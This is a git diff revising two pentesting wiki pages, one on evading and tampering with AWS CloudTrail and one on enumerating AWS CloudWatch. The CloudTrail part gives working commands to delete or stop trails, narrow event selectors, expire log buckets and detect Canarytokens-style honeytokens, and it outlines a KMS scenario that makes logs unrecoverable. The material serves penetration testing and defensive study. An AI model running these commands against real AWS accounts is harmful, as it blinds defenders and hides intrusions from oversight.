+However, honeytokens such as those created by [**Canarytokens**](https://canarytokens.org/generate)**,** [**SpaceCrab**](https://bitbucket.org/asecurityteam/spacecrab/issues?status=new&status=open)**,** and [**SpaceSiren**](https://github.com/spacesiren/spacesiren) may expose recognizable account, path, or username indicators. Therefore, if you can obtain an account name and/or account ID without creating a CloudTrail event in the victim account, **you could assess whether the key is a honeytoken**.<sup>[[21]](#references)[[22]](#references)[[24]](#references)</sup>
 
-[**Pacu**](https://github.com/RhinoSecurityLabs/pacu/blob/79cd7d58f7bff5693c6ae73b30a8455df6136cca/pacu/modules/iam__detect_honeytokens/main.py#L57) has some rules to detect if a key belongs to [**Canarytokens**](https://canarytokens.org/generate)**,** [**SpaceCrab**](https://bitbucket.org/asecurityteam/spacecrab/issues?status=new&status=open)**,** [**SpaceSiren**](https://github.com/spacesiren/spacesiren)**:**
+[**Pacu**](https://github.com/RhinoSecurityLabs/pacu/blob/79cd7d58f7bff5693c6ae73b30a8455df6136cca/pacu/modules/iam__detect_honeytokens/main.py#L57) has rules to detect whether a key belongs to [**Canarytokens**](https://canarytokens.org/generate)**,** [**SpaceCrab**](https://bitbucket.org/asecurityteam/spacecrab/issues?status=new&status=open)**,** or [**SpaceSiren**](https://github.com/spacesiren/spacesiren)**:**<sup>[[22]](#references)</sup>
 
-- If **`canarytokens.org`** appears in the role name or the account ID **`534261010715`** appears in the error message.
-  - Testing them more recently, they are using the account **`717712589309`** and still have the **`canarytokens.com`** string in the name.
-- If **`SpaceCrab`** appears in the role name in the error message
-- **SpaceSiren** uses **uuids** to generate usernames: `[a-f0-9]{8}-[a-f0-9]{4}-4[a-f0-9]{3}-[89aAbB][a-f0-9]{3}-[a-f0-9]{12}`
-- If the **name looks like randomly generated**, there are high probabilities that it's a honeytoken.
+- If **`canarytokens.org`** or **`canarytokens.com`** appears in the error message or ARN, or the account ID **`534261010715`** appears in the error message.<sup>[[22]](#references)</sup>
+  - More recent testing found the account **`717712589309`** and the **`canarytokens.com`** string in the name; these indicators can change.<sup>[[24]](#references)</sup>
+- If **`SpaceCrab`** appears in the role path or error message.<sup>[[21]](#references)[[22]](#references)</sup>
+- **SpaceSiren** uses **UUIDs** to generate usernames: `[a-f0-9]{8}-[a-f0-9]{4}-4[a-f0-9]{3}-[89aAbB][a-f0-9]{3}-[a-f0-9]{12}`.<sup>[[22]](#references)</sup>
+- If the **name looks randomly generated**, there are high probabilities that it's a honeytoken.<sup>[[22]](#references)</sup>
 
 #### Get the account ID from the Key ID
 
-You can get the **Account ID** from the **encoded** inside the **access key** as [**explained here**](https://medium.com/@TalBeerySec/a-short-note-on-aws-key-id-f88cc4317489) and check the account ID with your list of honeytokens AWS accounts:
+You can derive the **Account ID** from the encoded portion of some AWS access key IDs as [**explained here**](https://medium.com/@TalBeerySec/a-short-note-on-aws-key-id-f88cc4317489), then compare it with a list of honeytoken AWS accounts:<sup>[[23]](#references)</sup>
 
 ```python
 import base64
@@ -189,7 +191,7 @@ def AWSAccount_from_AWSKeyID(AWSKeyID):
 print("account id:" + "{:012d}".format(AWSAccount_from_AWSKeyID("ASIAQNZGKIQY56JQ7WML")))
 ```
 
-For more information check the [**original research**](https://medium.com/@TalBeerySec/a-short-note-on-aws-key-id-f88cc4317489).
+For more information, check the [**original research**](https://medium.com/@TalBeerySec/a-short-note-on-aws-key-id-f88cc4317489).<sup>[[23]](#references)</sup>
 
 #### Do not generate a log
 
@@ -199,22 +201,22 @@ The thing is that the output will show you an error indicating the account ID an
 
 #### AWS services without logs
 
-In the past there were some **AWS services that didn't send logs to CloudTrail** (find a [list here](https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-unsupported-aws-services.html)). Some of those services will **respond** with an **error** containing the **ARN of the key role** if someone unauthorised (the honeytoken key) tries to access it.
+CloudTrail coverage is service-specific and can change. AWS currently documents preview or non-GA services, services without public APIs, and AWS Import/Export among unsupported cases; consult the current [service-specific list](https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-unsupported-aws-services.html) before assuming that an API is unlogged.<sup>[[19]](#references)</sup> Earlier research found that some unauthorized requests returned an error containing the **ARN of the key role** if someone unauthorised (the honeytoken key) tried to access it.<sup>[[21]](#references)</sup>
 
-This way, an **attacker can obtain the ARN of the key without triggering any log**. In the ARN the attacker can see the **AWS account ID and the name**, it's easy to know the honeytoken's companies accounts ID and names, so this way an attacker can identify if the token is a honeytoken.
+This way, an **attacker can obtain the ARN of the key without triggering any log**. In the ARN the attacker can see the **AWS account ID and the name**, it's easy to know the honeytoken's companies accounts ID and names, so this way an attacker can identify if the token is a honeytoken.<sup>[[21]](#references)</sup>
 
 ![AWS CLI AccessDenied error for describe-fleets exposing the caller ARN in the response](<../../../../images/image (93).png>)
 
 > [!CAUTION]
-> Note that all public APIs discovered not to create CloudTrail logs are now fixed, so maybe you need to find your own...
+> Historical no-log behavior may have been fixed or changed, so do not rely on old API lists; verify current service coverage only in an authorized assessment.<sup>[[19]](#references)[[21]](#references)</sup>
 >
 > For more information check the [**original research**](https://rhinosecuritylabs.com/aws/aws-iam-enumeration-2-0-bypassing-cloudtrail-logging/).
 
 ### Accessing Third Infrastructure
 
-Certain AWS services will **spawn some infrastructure** such as **Databases** or **Kubernetes** clusters (EKS). A user **talking directly to those services** (like the Kubernetes API) **won’t use the AWS API**, so CloudTrail won’t be able to see this communication.
+Certain AWS services will **spawn some infrastructure** such as **Databases** or **Kubernetes** clusters (EKS). A user **talking directly to those services** (like the Kubernetes API) is making a request to that service rather than an AWS control-plane API. EKS control-plane audit and authenticator logs can record Kubernetes API activity when enabled, while console resource reads generate CloudTrail `AccessKubernetesApi` events; direct Kubernetes API traffic should therefore not be equated with AWS API CloudTrail visibility.<sup>[[25]](#references)[[26]](#references)</sup>
 
-Therefore, a user with access to EKS that has discovered the URL of the EKS API could generate a token locally and **talk to the API service directly without getting detected by CloudTrail**.
+Therefore, a user with access to EKS that has discovered the URL of the EKS API could generate a token locally and **talk to the API service directly without generating an equivalent CloudTrail event for each Kubernetes request**; review EKS control-plane logs as well.<sup>[[25]](#references)[[26]](#references)</sup>
 
 More info in:
 
@@ -223,6 +225,8 @@ More info in:
 {{#endref}}
 
 ### Modifying CloudTrail Config
+
+These AWS CLI operations can remove a trail, stop its logging, or change its scope; use the trail's home Region where required and verify the impact before applying them.<sup>[[16]](#references)[[27]](#references)</sup>
 
 #### Delete trails
 
@@ -238,8 +242,10 @@ aws cloudtrail stop-logging --name [trail-name]
 
 #### Disable multi-region logging
 
+Use the current AWS CLI option names when disabling multi-Region and global-service logging:<sup>[[27]](#references)</sup>
+
 ```bash
-aws cloudtrail update-trail --name [trail-name] --no-is-multi-region --no-include-global-services
+aws cloudtrail update-trail --name [trail-name] --no-is-multi-region-trail --no-include-global-service-events
 ```
 
 #### Disable Logging by Event Selectors
@@ -248,18 +254,20 @@ aws cloudtrail update-trail --name [trail-name] --no-is-multi-region --no-includ
 # Leave only the ReadOnly selector
 aws cloudtrail put-event-selectors --trail-name <trail_name> --event-selectors '[{"ReadWriteType": "ReadOnly"}]' --region <region>
 
-# Remove all selectors (stop Insights)
+# Remove all basic event selectors (no events match this trail)
 aws cloudtrail put-event-selectors --trail-name <trail_name> --event-selectors '[]' --region <region>
 ```
 
-In the first example, a single event selector is provided as a JSON array with a single object. The `"ReadWriteType": "ReadOnly"` indicates that the **event selector should only capture read-only events** (so CloudTrail insights **won't be checking write** events for example).
+In the first example, a single event selector is provided as a JSON array with a single object. The `"ReadWriteType": "ReadOnly"` indicates that the **event selector should only capture read-only events**, so write-management events are not captured by this trail. CloudTrail Insights is configured separately; removing basic event selectors does not itself guarantee that every Insights configuration is disabled.<sup>[[14]](#references)[[18]](#references)</sup>
 
 You can customize the event selector based on your specific requirements.
 
 #### Logs deletion via S3 lifecycle policy
 
+The legacy `put-bucket-lifecycle` operation is deprecated; use `put-bucket-lifecycle-configuration` for new configurations:<sup>[[28]](#references)</sup>
+
 ```bash
-aws s3api put-bucket-lifecycle --bucket <bucket_name> --lifecycle-configuration '{"Rules": [{"Status": "Enabled", "Prefix": "", "Expiration": {"Days": 7}}]}' --region <region>
+aws s3api put-bucket-lifecycle-configuration --bucket <bucket_name> --lifecycle-configuration '{"Rules": [{"Status": "Enabled", "Filter": {"Prefix": ""}, "Expiration": {"Days": 7}}]}' --region <region>
 ```
 
 ### Modifying Bucket Configuration
@@ -273,8 +281,7 @@ aws s3api put-bucket-lifecycle --bucket <bucket_name> --lifecycle-configuration 
 
 #### S3 ransomware
 
-You could **generate an asymmetric key** and make **CloudTrail encrypt the data** with that key and **delete the private key** so the CloudTrail contents cannot be recovered.\
-This is basically a **S3-KMS ransomware** explained in:
+CloudTrail and S3 SSE-KMS integrations require a **symmetric KMS key**; they cannot use an asymmetric key. If an attacker can change the encryption configuration to a customer-managed symmetric key they control and then disable or destroy that key, encrypted CloudTrail objects can become unavailable, subject to key policies, permissions, and independent retention controls.<sup>[[8]](#references)[[29]](#references)</sup> This is a **S3-KMS ransomware** scenario explained in:
 
 {{#ref}}
 ../../aws-post-exploitation/aws-s3-post-exploitation/README.md
@@ -288,12 +295,36 @@ This is an easier way to perform the previous attack with different permissions 
 ../../aws-post-exploitation/aws-kms-post-exploitation/README.md
 {{#endref}}
 
-## **References**
+## References
 
-- [https://cloudsecdocs.com/aws/services/logging/cloudtrail/#inventory](https://cloudsecdocs.com/aws/services/logging/cloudtrail/#inventory)
+- [1] [CloudTrail - CloudSecDocs](https://cloudsecdocs.com/aws/services/logging/cloudtrail/#inventory)
+- [2] [CloudTrail concepts](https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-concepts.html)
+- [3] [CloudTrail event record contents](https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-event-reference-record-contents.html)
+- [4] [Getting and viewing CloudTrail log files](https://docs.aws.amazon.com/awscloudtrail/latest/userguide/get-and-view-cloudtrail-log-files.html)
+- [5] [CloudTrail log file examples](https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-log-file-examples.html)
+- [6] [Validating CloudTrail log file integrity](https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-log-file-validation-intro.html)
+- [7] [CloudTrail digest file structure](https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-log-file-validation-digest-file-structure.html)
+- [8] [Encrypting CloudTrail log files with AWS KMS](https://docs.aws.amazon.com/awscloudtrail/latest/userguide/encrypting-cloudtrail-log-files-with-aws-kms.html)
+- [9] [Receiving CloudTrail log files from multiple accounts](https://docs.aws.amazon.com/awscloudtrail/latest/userguide/turn-on-cloudtrail-in-additional-accounts.html)
+- [10] [Creating a trail for an organization](https://docs.aws.amazon.com/awscloudtrail/latest/userguide/creating-trail-organization.html)
+- [11] [How CloudTrail works](https://docs.aws.amazon.com/awscloudtrail/latest/userguide/how-cloudtrail-works.html)
+- [12] [Monitoring CloudTrail log files with CloudWatch Logs](https://docs.aws.amazon.com/awscloudtrail/latest/userguide/monitor-cloudtrail-log-files-with-cloudwatch-logs.html)
+- [13] [CloudTrail required policy for CloudWatch Logs](https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-required-policy-for-cloudwatch-logs.html)
+- [14] [Logging Insights events with CloudTrail](https://docs.aws.amazon.com/awscloudtrail/latest/userguide/logging-insights-events-with-cloudtrail.html)
+- [15] [Viewing service last accessed data](https://docs.aws.amazon.com/IAM/latest/UserGuide/access_policies_last-accessed-view-data.html)
+- [16] [AWS CLI CloudTrail command reference](https://docs.aws.amazon.com/cli/latest/reference/cloudtrail/index.html)
+- [17] [AWS CLI validate-logs command](https://docs.aws.amazon.com/cli/latest/reference/cloudtrail/validate-logs.html)
+- [18] [AWS CLI put-event-selectors command](https://docs.aws.amazon.com/cli/latest/reference/cloudtrail/put-event-selectors.html)
+- [19] [CloudTrail-supported AWS services and integrations](https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-unsupported-aws-services.html)
+- [20] [Cloud Security: CSV Injection in AWS CloudTrail](https://rhinosecuritylabs.com/aws/cloud-security-csv-injection-aws-cloudtrail/)
+- [21] [AWS IAM Enumeration 2.0: Bypassing CloudTrail Logging](https://rhinosecuritylabs.com/aws/aws-iam-enumeration-2-0-bypassing-cloudtrail-logging/)
+- [22] [Pacu IAM honeytoken detection module](https://github.com/RhinoSecurityLabs/pacu/blob/79cd7d58f7bff5693c6ae73b30a8455df6136cca/pacu/modules/iam__detect_honeytokens/main.py#L57)
+- [23] [A short note on AWS KEY ID](https://medium.com/@TalBeerySec/a-short-note-on-aws-key-id-f88cc4317489)
+- [24] [Canaries: AWS access keys as honeypots](https://trufflesecurity.com/blog/canaries)
+- [25] [Amazon EKS control plane logs](https://docs.aws.amazon.com/eks/latest/userguide/control-plane-logs.html)
+- [26] [View Kubernetes resources in Amazon EKS](https://docs.aws.amazon.com/eks/latest/userguide/view-kubernetes-resources.html)
+- [27] [AWS CLI update-trail command](https://docs.aws.amazon.com/cli/latest/reference/cloudtrail/update-trail.html)
+- [28] [AWS CLI put-bucket-lifecycle-configuration command](https://docs.aws.amazon.com/cli/latest/reference/s3api/put-bucket-lifecycle-configuration.html)
+- [29] [How AWS CloudTrail uses AWS KMS](https://docs.aws.amazon.com/awscloudtrail/latest/userguide/how-kms-works-with-cloudtrail.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-

--- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudwatch-enum.md
@@ -1,145 +1,146 @@
 # AWS - CloudWatch Enum
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## CloudWatch
 
-**CloudWatch** **collects** monitoring and operational **data** in the form of logs/metrics/events providing a **unified view of AWS resources**, applications and services.\
-CloudWatch Log Event have a **size limitation of 256KB on each log line**.\
-It can set **high resolution alarms**, visualize **logs** and **metrics** side by side, take automated actions, troubleshoot issues, and discover insights to optimize applications.
+**CloudWatch** **collects** monitoring and operational **data** in the form of logs/metrics/events, providing a **unified view of AWS resources**, applications, and services. It can set **high-resolution alarms**, visualize **logs** and **metrics** side by side, take automated actions, troubleshoot issues, and discover insights to optimize applications.<sup>[[1]](#references)[[4]](#references)</sup>
 
-You can monitor for example logs from CloudTrail. Events that are monitored:
+A CloudWatch Logs event can be up to **1 MB**. CloudTrail limits events delivered to CloudWatch Logs or EventBridge to **256 KB**, so the latter limit applies when monitoring CloudTrail events through those services.<sup>[[5]](#references)[[6]](#references)</sup>
+
+You can monitor, for example, CloudTrail events by configuring a trail to send matching events to CloudWatch Logs. Depending on the trail settings, CloudTrail can send management, data, and Insights events.<sup>[[6]](#references)</sup>
 
 - Changes to Security Groups and NACLs
-- Starting, Stopping, rebooting and terminating EC2 instances
-- Changes to Security Policies within IAM and S3
+- Starting, stopping, rebooting, and terminating EC2 instances
+- Changes to security policies within IAM and S3
 - Failed login attempts to the AWS Management Console
 - API calls that resulted in failed authorization
-- Filters to search in cloudwatch: [https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/FilterAndPatternSyntax.html](https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/FilterAndPatternSyntax.html)
+- Filters to search in CloudWatch: filter pattern syntax.<sup>[[7]](#references)</sup>
 
 ## Key concepts
 
 ### Namespaces
 
-A namespace is a container for CloudWatch metrics. It helps to categorize and isolate metrics, making it easier to manage and analyze them.
+A namespace is a container for CloudWatch metrics. It helps to categorize and isolate metrics, making it easier to manage and analyze them.<sup>[[3]](#references)</sup>
 
-- **Examples**: AWS/EC2 for EC2-related metrics, AWS/RDS for RDS metrics.
+- **Examples**: AWS/EC2 for EC2-related metrics, AWS/RDS for RDS metrics.<sup>[[3]](#references)</sup>
 
 ### Metrics
 
-Metrics are data points collected over time that represent the performance or utilization of AWS resources. Metrics can be collected from AWS services, custom applications, or third-party integrations.
+Metrics are time-ordered data points that represent the performance or utilization of AWS resources. Metrics can be collected from AWS services, custom applications, or other activity from which data is collected.<sup>[[3]](#references)</sup>
 
-- **Example**: CPUUtilization, NetworkIn, DiskReadOps.
+- **Example**: CPUUtilization, NetworkIn, DiskReadOps.<sup>[[3]](#references)</sup>
 
 ### Dimensions
 
-Dimensions are key-value pairs that are part of metrics. They help to uniquely identify a metric and provide additional context, being 30 the most number of dimensions that can be associated with a metric. Dimensions also allow to filter and aggregate metrics based on specific attributes.
+Dimensions are key-value pairs that are part of a metric's identity. They provide additional context and allow metrics to be filtered and aggregated by specific attributes; up to 30 dimensions can be associated with a metric.<sup>[[3]](#references)</sup>
 
-- **Example**: For EC2 instances, dimensions might include InstanceId, InstanceType, and AvailabilityZone.
+- **Example**: For EC2 instances, dimensions might include InstanceId, InstanceType, and AvailabilityZone.<sup>[[3]](#references)</sup>
 
 ### Statistics
 
-Statistics are mathematical calculations performed on metric data to summarize it over time. Common statistics include Average, Sum, Minimum, Maximum, and SampleCount.
+Statistics are mathematical calculations performed on metric data to summarize it over time. Common statistics include Average, Sum, Minimum, Maximum, and SampleCount.<sup>[[3]](#references)</sup>
 
-- **Example**: Calculating the average CPU utilization over a period of one hour.
+- **Example**: Calculating the average CPU utilization over a period of one hour.<sup>[[3]](#references)</sup>
 
 ### Units
 
-Units are the measurement type associated with a metric. Units help to provide context and meaning to the metric data. Common units include Percent, Bytes, Seconds, Count.
+Units are the measurement type associated with a metric. Units help to provide context and meaning to the metric data. Common units include Percent, Bytes, Seconds, and Count.<sup>[[3]](#references)</sup>
 
-- **Example**: CPUUtilization might be measured in Percent, while NetworkIn might be measured in Bytes.
+- **Example**: CPUUtilization might be measured in Percent, while NetworkIn might be measured in Bytes.<sup>[[3]](#references)</sup>
 
 ## CloudWatch Features
 
 ### Dashboard
 
-**CloudWatch Dashboards** provide customizable **views of your AWS CloudWatch metrics**. It is possible to create and configure dashboards to visualize data and monitor resources in a single view, combining different metrics from various AWS services.
+**CloudWatch Dashboards** provide customizable **views of your AWS CloudWatch metrics**. You can configure dashboards to visualize telemetry and monitor resources in a single view, including resources in different Regions.<sup>[[8]](#references)</sup>
 
 **Key Features**:
 
-- **Widgets**: Building blocks of dashboards, including graphs, text, alarms, and more.
-- **Customization**: Layout and content can be customized to fit specific monitoring needs.
+- **Widgets**: Building blocks of dashboards, including graphs, text, alarms, and more.<sup>[[8]](#references)</sup>
+- **Customization**: Layout and content can be customized to fit specific monitoring needs.<sup>[[8]](#references)</sup>
 
 **Example Use Case**:
 
-- A single dashboard showing key metrics for your entire AWS environment, including EC2 instances, RDS databases, and S3 buckets.
+- A single dashboard showing key metrics for your entire AWS environment, including EC2 instances, RDS databases, and S3 buckets.<sup>[[8]](#references)</sup>
 
 ### Metric Stream and Metric Data
 
-**Metric Streams** in AWS CloudWatch enable you to continuously stream CloudWatch metrics to a destination of your choice in near real-time. This is particularly useful for advanced monitoring, analytics, and custom dashboards using tools outside of AWS.
+**Metric Streams** in AWS CloudWatch enable you to continuously stream CloudWatch metrics to a destination of your choice with near-real-time delivery. Destinations include Amazon S3, Firehose-backed endpoints, and supported third-party providers.<sup>[[9]](#references)</sup>
 
-**Metric Data** inside Metric Streams refers to the actual measurements or data points that are being streamed. These data points represent various metrics like CPU utilization, memory usage, etc., for AWS resources.
+**Metric Data** inside a metric stream refers to the measurements or data points selected by the stream's namespace/metric filters. The stream can include metrics such as CPU utilization or memory usage when those metrics exist and match the filters.<sup>[[9]](#references)</sup>
 
 **Example Use Case**:
 
-- Sending real-time metrics to a third-party monitoring service for advanced analysis.
-- Archiving metrics in an Amazon S3 bucket for long-term storage and compliance.
+- Sending real-time metrics to a third-party monitoring service for advanced analysis.<sup>[[9]](#references)</sup>
+- Archiving metrics in an Amazon S3 bucket for long-term storage and compliance.<sup>[[9]](#references)</sup>
 
 ### Alarm
 
-**CloudWatch Alarms** monitor your metrics and perform actions based on predefined thresholds. When a metric breaches a threshold, the alarm can perform one or more actions such as sending notifications via SNS, triggering an auto-scaling policy, or running an AWS Lambda function.
+**CloudWatch Alarms** monitor your metrics and perform actions based on predefined thresholds. When a metric breaches a threshold, the alarm can perform one or more actions such as sending notifications via SNS, triggering an Auto Scaling policy, or invoking an AWS Lambda function.<sup>[[10]](#references)</sup>
 
 **Key Components**:
 
-- **Threshold**: The value at which the alarm triggers.
-- **Evaluation Periods**: The number of periods over which data is evaluated.
-- **Datapoints to Alarm**: The number of periods with a reached threshold needed to trigger the alarm
-- **Actions**: What happens when an alarm state is triggered (e.g., notify via SNS).
+- **Threshold**: The value at which the alarm triggers.<sup>[[10]](#references)</sup>
+- **Evaluation Periods**: The number of periods over which data is evaluated.<sup>[[10]](#references)</sup>
+- **Datapoints to Alarm**: The number of periods with a reached threshold needed to trigger the alarm.<sup>[[10]](#references)</sup>
+- **Actions**: What happens when an alarm state is triggered (e.g., notify via SNS).<sup>[[10]](#references)</sup>
 
 **Example Use Case**:
 
-- Monitoring EC2 instance CPU utilization and sending a notification via SNS if it exceeds 80% for 5 consecutive minutes.
+- Monitoring EC2 instance CPU utilization and sending a notification via SNS if it exceeds 80% for 5 consecutive minutes.<sup>[[10]](#references)</sup>
 
 ### Anomaly Detectors
 
-**Anomaly Detectors** use machine learning to automatically detect anomalies in your metrics. You can apply anomaly detection to any CloudWatch metric to identify deviations from normal patterns that might indicate issues.
+**Anomaly Detectors** use a model built from historical metric data to identify deviations from expected values. The model accounts for typical hourly, daily, and weekly patterns and can produce an anomaly-detection band.<sup>[[11]](#references)</sup>
 
 **Key Components**:
 
-- **Model Training**: CloudWatch uses historical data to train a model and establish what normal behavior looks like.
-- **Anomaly Detection Band**: A visual representation of the expected range of values for a metric.
+- **Model Training**: CloudWatch uses historical data to train a model and establish what normal behavior looks like.<sup>[[11]](#references)</sup>
+- **Anomaly Detection Band**: A visual representation of the expected range of values for a metric.<sup>[[11]](#references)</sup>
 
 **Example Use Case**:
 
-- Detecting unusual CPU utilization patterns in an EC2 instance that might indicate a security breach or application issue.
+- Detecting unusual CPU utilization patterns in an EC2 instance that might indicate a security breach or application issue.<sup>[[11]](#references)</sup>
 
 ### Insight Rules and Managed Insight Rules
 
-**Insight Rules** allow you to identify trends, detect spikes, or other patterns of interest in your metric data using **powerful mathematical expressions** to define the conditions under which actions should be taken. These rules can help you identify anomalies or unusual behaviors in your resource performance and utilization.
+**Contributor Insights rules** analyze log data with rule expressions and produce time series for top-N contributors, unique contributors, and their usage. **Managed Insight Rules** are built-in rules supplied by AWS for metrics from other AWS services.<sup>[[12]](#references)</sup>
 
-**Managed Insight Rules** are pre-configured **insight rules provided by AWS**. They are designed to monitor specific AWS services or common use cases and can be enabled without needing detailed configuration.
+Managed rules can be enabled without writing a custom rule; custom rules can be enabled, disabled, or deleted as needed.<sup>[[12]](#references)</sup>
 
 **Example Use Case**:
 
-- Monitoring RDS Performance: Enable a managed insight rule for Amazon RDS that monitors key performance indicators such as CPU utilization, memory usage, and disk I/O. If any of these metrics exceed safe operational thresholds, the rule can trigger an alert or automated mitigation action.
+- Monitoring RDS Performance: where AWS provides a managed rule for the resource, enable it to analyze service-specific telemetry such as CPU utilization, memory usage, or disk I/O and use the resulting data for alerting or automated response.<sup>[[12]](#references)</sup>
 
 ### CloudWatch Logs <a href="#cloudwatch-logs" id="cloudwatch-logs"></a>
 
-Allows to **aggregate and monitor logs from applications** and systems from **AWS services** (including CloudTrail) and **from apps/systems** (**CloudWatch Agen**t can be installed on a host). Logs can be **stored indefinitely** (depending on the Log Group settings) and can be exported.
+CloudWatch Logs can **aggregate and monitor logs from applications** and systems from **AWS services** (including CloudTrail) and **from apps/systems** (**CloudWatch Agent** can be installed on a host). Log data is retained indefinitely by default unless a log-group retention policy is set, and it can be exported to Amazon S3.<sup>[[4]](#references)[[6]](#references)[[15]](#references)[[23]](#references)</sup>
 
 **Elements**:
 | Term                     | Definition                                                                                                                                                 |
 | ------------------------ | ---------------------------------------------------------------------------------------------------------------------------------------------------------- |
-| **Log Group**            | A **collection of log streams** that share the same retention, monitoring, and access control settings                                                     |
-| **Log Stream**           | A sequence of **log events** that share the **same source**                                                                                                |
-| **Subscription Filters** | Define a **filter pattern that matches events** in a particular log group, send them to Kinesis Data Firehose stream, Kinesis stream, or a Lambda function |
+| **Log Group**            | A **collection of log streams** that share the same retention, monitoring, and access control settings<sup>[[13]](#references)</sup>                    |
+| **Log Stream**           | A sequence of **log events** that share the **same source**<sup>[[13]](#references)</sup>                                                               |
+| **Subscription Filters** | Define a **filter pattern that matches events** in a particular log group and send them to Kinesis Data Firehose, Kinesis Data Streams, or a Lambda function<sup>[[30]](#references)</sup> |
 
 ### CloudWatch Monitoring & Events
 
-CloudWatch **basic** aggregates data **every 5min** (the **detailed** one does that **every 1 min**). After the aggregation, it **checks the thresholds of the alarms** in case it needs to trigger one.\
-In that case, CLoudWatch can be prepared to send an event and perform some automatic actions (AWS lambda functions, SNS topics, SQS queues, Kinesis Streams)
+For services such as EC2, **basic monitoring** publishes metrics every **5 minutes**, while **detailed monitoring** publishes them every **1 minute**. Alarms evaluate metrics over their configured periods and can invoke actions such as SNS notifications, Lambda functions, EC2 actions, or Auto Scaling actions when alarm state changes.<sup>[[10]](#references)[[14]](#references)</sup>
+
+**EventBridge**, formerly CloudWatch Events, can match event patterns or schedules and route matching events to targets such as Lambda functions, SNS topics, SQS queues, and Kinesis streams. The `aws events` API namespace remains compatible with existing CloudWatch Events code.<sup>[[21]](#references)[[22]](#references)</sup>
 
 ### Agent Installation
 
 You can install agents inside your machines/containers to automatically send the logs back to CloudWatch.
 
-- **Create** a **role** and **attach** it to the **instance** with permissions allowing CloudWatch to collect data from the instances in addition to interacting with AWS systems manager SSM (CloudWatchAgentAdminPolicy & AmazonEC2RoleforSSM)
-- **Download** and **install** the **agent** onto the EC2 instance ([https://s3.amazonaws.com/amazoncloudwatch-agent/linux/amd64/latest/AmazonCloudWatchAgent.zip](https://s3.amazonaws.com/amazoncloudwatch-agent/linux/amd64/latest/AmazonCloudWatchAgent.zip)). You can download it from inside the EC2 or install it automatically using AWS System Manager selecting the package AWS-ConfigureAWSPackage
-- **Configure** and **start** the CloudWatch Agent
+- **Create** a role and **attach** it to the instance with `CloudWatchAgentServerPolicy` so the agent can publish metrics and logs; when using Systems Manager, also satisfy the Systems Manager prerequisites.<sup>[[15]](#references)[[24]](#references)</sup>
+- **Download** and **install** the **agent** onto the EC2 instance ([CloudWatch agent package](https://s3.amazonaws.com/amazoncloudwatch-agent/linux/amd64/latest/AmazonCloudWatchAgent.zip)). You can download it from inside the EC2 instance or install it automatically with Systems Manager using the `AWS-ConfigureAWSPackage` document.<sup>[[15]](#references)</sup>
+- **Configure** and **start** the CloudWatch Agent.<sup>[[15]](#references)</sup>
 
-A log group has many streams. A stream has many events. And inside of each stream, the events are guaranteed to be in order.
+A log group has many streams, and a stream is a sequence of events from the same source.<sup>[[13]](#references)</sup>
 
 ## Enumeration
+
+The following commands enumerate CloudWatch dashboards, metrics, alarms, anomaly detectors, Contributor Insights rules, tags, metric streams, CloudWatch Logs, and EventBridge resources. The CloudWatch action names map to the API operations and IAM permissions in the service authorization reference.<sup>[[2]](#references)</sup>
 
 ```bash
 # Dashboards #
@@ -179,7 +180,7 @@ aws cloudwatch describe-alarms [--alarm-names <value>] [--alarm-name-prefix <val
 aws cloudwatch describe-alarm-history [--alarm-name <value>] [--alarm-types <value>] [--history-item-type <ConfigurationUpdate | StateUpdate | Action>] [--start-date <value>] [--end-date <value>]
 
 ## Retrieves standard alarms based on the specified metric
-aws cloudwatch escribe-alarms-for-metric --metric-name <value> --namespace <value> [--dimensions <value>]
+aws cloudwatch describe-alarms-for-metric --metric-name <value> --namespace <value> [--dimensions <value>]
 
 # Anomaly Detections #
 
@@ -201,15 +202,22 @@ aws cloudwatch list-managed-insight-rules --resource-arn <value>
 aws cloudwatch list-tags-for-resource --resource-arn <value>
 
 # CloudWatch Logs #
-aws logs tail "<log_group_name>" --followaws logs get-log-events --log-group-name "<log_group_name>" --log-stream-name "<log_stream_name>" --output text > <output_file>
+aws logs tail "<log_group_name>" --follow
+aws logs get-log-events --log-group-name "<log_group_name>" --log-stream-name "<log_stream_name>" --output text > <output_file>
 
-# CloudWatch Events #
+# EventBridge (CloudWatch Events) #
 aws events list-rules
-aws events describe-rule --name <name>aws events list-targets-by-rule --rule <name>aws events list-archives
-aws events describe-archive --archive-name <name>aws events list-connections
-aws events describe-connection --name <name>aws events list-endpoints
-aws events describe-endpoint --name <name>aws events list-event-sources
-aws events describe-event-source --name <name>aws events list-replays
+aws events describe-rule --name <name>
+aws events list-targets-by-rule --rule <name>
+aws events list-archives
+aws events describe-archive --archive-name <name>
+aws events list-connections
+aws events describe-connection --name <name>
+aws events list-endpoints
+aws events describe-endpoint --name <name>
+aws events list-event-sources
+aws events describe-event-source --name <name>
+aws events list-replays
 aws events list-api-destinations
 aws events list-event-buses
 ```
@@ -218,20 +226,22 @@ aws events list-event-buses
 
 ### **`cloudwatch:DeleteAlarms`,`cloudwatch:PutMetricAlarm` , `cloudwatch:PutCompositeAlarm`**
 
-An attacker with this permissions could significantly undermine an organization's monitoring and alerting infrastructure. By deleting existing alarms, an attacker could disable crucial alerts that notify administrators of critical performance issues, security breaches, or operational failures. Furthermore, by creating or modifying metric alarms, the attacker could also mislead administrators with false alerts or silence legitimate alarms, effectively masking malicious activities and preventing timely responses to actual incidents.
